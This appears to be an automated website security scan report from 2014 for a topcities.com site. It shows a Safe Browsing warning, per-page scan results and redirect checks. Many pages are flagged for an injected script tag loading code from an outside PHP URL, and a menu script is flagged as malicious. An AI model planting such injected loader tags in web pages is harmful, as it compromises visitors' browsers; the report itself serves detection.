Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sablemorgans.topcities.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.sablemorgans.topcities.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 16 Dec 2014 22:10:04 GMT Location: http://sablemorgans.topcities.com/ Server: Apache/2.0.40 (Red Hat Linux) Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 | clean |
http://sablemorgans.topcities.com/ | 200 OK Content-Length: 9477 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/gifpics2/mm_css_menu.js | 200 OK Content-Length: 8292 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var mmOpenContainer = null; var mmOpenMenus = null; var mmHideMenuTimer = null; function MM_menuStartTimeout(hideTimeout) { mmHideMenuTimer = setTimeout("MM_menuHideMenus()", hideTimeout); } function MM_menuHideMenus() { MM_menuResetTimeout(); if(mmOpenContainer) { var c = document.getElementById(mmOpenContainer); c.style.visibility = "inherit"; mmOpenContainer = null; } if( mmOpenMenus ) { for(var i in mmOpenMenus) { v Antivirus reports:
| ||
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 21407 Content-Type: application/x-javascript | clean |
http://www.sablemorgans.topcities.com/page13.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 16 Dec 2014 22:10:05 GMT Location: http://sablemorgans.topcities.com/page13.html Server: Apache/2.0.40 (Red Hat Linux) Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | clean |
http://sablemorgans.topcities.com/page13.html | 200 OK Content-Length: 41732 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/page20.html | 200 OK Content-Length: 9512 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/page103.html | 200 OK Content-Length: 37900 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/page63.html | 200 OK Content-Length: 30735 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/page27.html | 200 OK Content-Length: 28004 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/javasct:; | HTTP/1.1 302 Found Connection: close Date: Tue, 16 Dec 2014 22:10:11 GMT Location: http://www.topcities.com/docs/errors/404.htm Server: Apache/2.0.40 (Red Hat Linux) Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.topcities.com/docs/errors/404.htm | HTTP/1.1 200 OK Connection: close Date: Tue, 16 Dec 2014 09:44:31 GMT Accept-Ranges: bytes ETag: "16760e-1bb-548397b8" Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_throttle/3.1.2 mod_perl/1.24 Content-Length: 443 Content-Type: text/html Last-Modified: Sat, 06 Dec 2014 23:56:40 GMT | clean |
http://www.hug.me/ | 200 OK Content-Length: 66920 Content-Type: text/html | clean |
http://www.hug.me//ajax.googleapis.com/ajax/libs/jquery/1.10.0/jquery.min.js/ | 404 Not Found Content-Length: 6573 Content-Type: text/html | clean |
http://www.hug.me/test404page.js | 404 Not Found Content-Length: 6573 Content-Type: text/html | clean |
http://sablemorgans.topcities.com//assets.strikingly.com/assets/themes/pitch_new/main_static-a42b6aab3e966085fc975c0f0cba45bc.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 16 Dec 2014 22:10:15 GMT Location: http://www.topcities.com/docs/errors/404.htm Server: Apache/2.0.40 (Red Hat Linux) Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://sablemorgans.topcities.com//assets.strikingly.com/assets/bobcat/show_init-4960707e474840b2994e7b01c4c76a3e.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 16 Dec 2014 22:10:15 GMT Location: http://www.topcities.com/docs/errors/404.htm Server: Apache/2.0.40 (Red Hat Linux) Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://sablemorgans.topcities.com/index.html | 200 OK Content-Length: 9477 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/page152.html | 200 OK Content-Length: 33998 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/page2.html | 200 OK Content-Length: 27355 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> | ||
http://sablemorgans.topcities.com/page145.html | 200 OK Content-Length: 26475 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ochoucomics.com/media/gblkpxyz.php?id="></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sablemorgans.topcities.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 22:10:04 GMT
Accept-Ranges: bytes
ETag: "dc3b7-2505-513f8f80"
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 9477
Content-Type: text/html
Last-Modified: Sat, 28 Jun 2014 01:26:38 GMT
X-Pad: avoid browser bug
...9477 bytes of data.
GET / HTTP/1.1
Host: sablemorgans.topcities.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 22:10:04 GMT
Accept-Ranges: bytes
ETag: "dc3b7-2505-513f8f80"
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 9477
Content-Type: text/html
Last-Modified: Sat, 28 Jun 2014 01:26:38 GMT
X-Pad: avoid browser bug
...9477 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sablemorgans.topcities.com
Referer: http://www.google.com/search?q=sablemorgans.topcities.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sablemorgans.topcities.com
Referer: http://www.google.com/search?q=sablemorgans.topcities.com
Result:
The result is similar to the first query. There are no suspicious redirects found.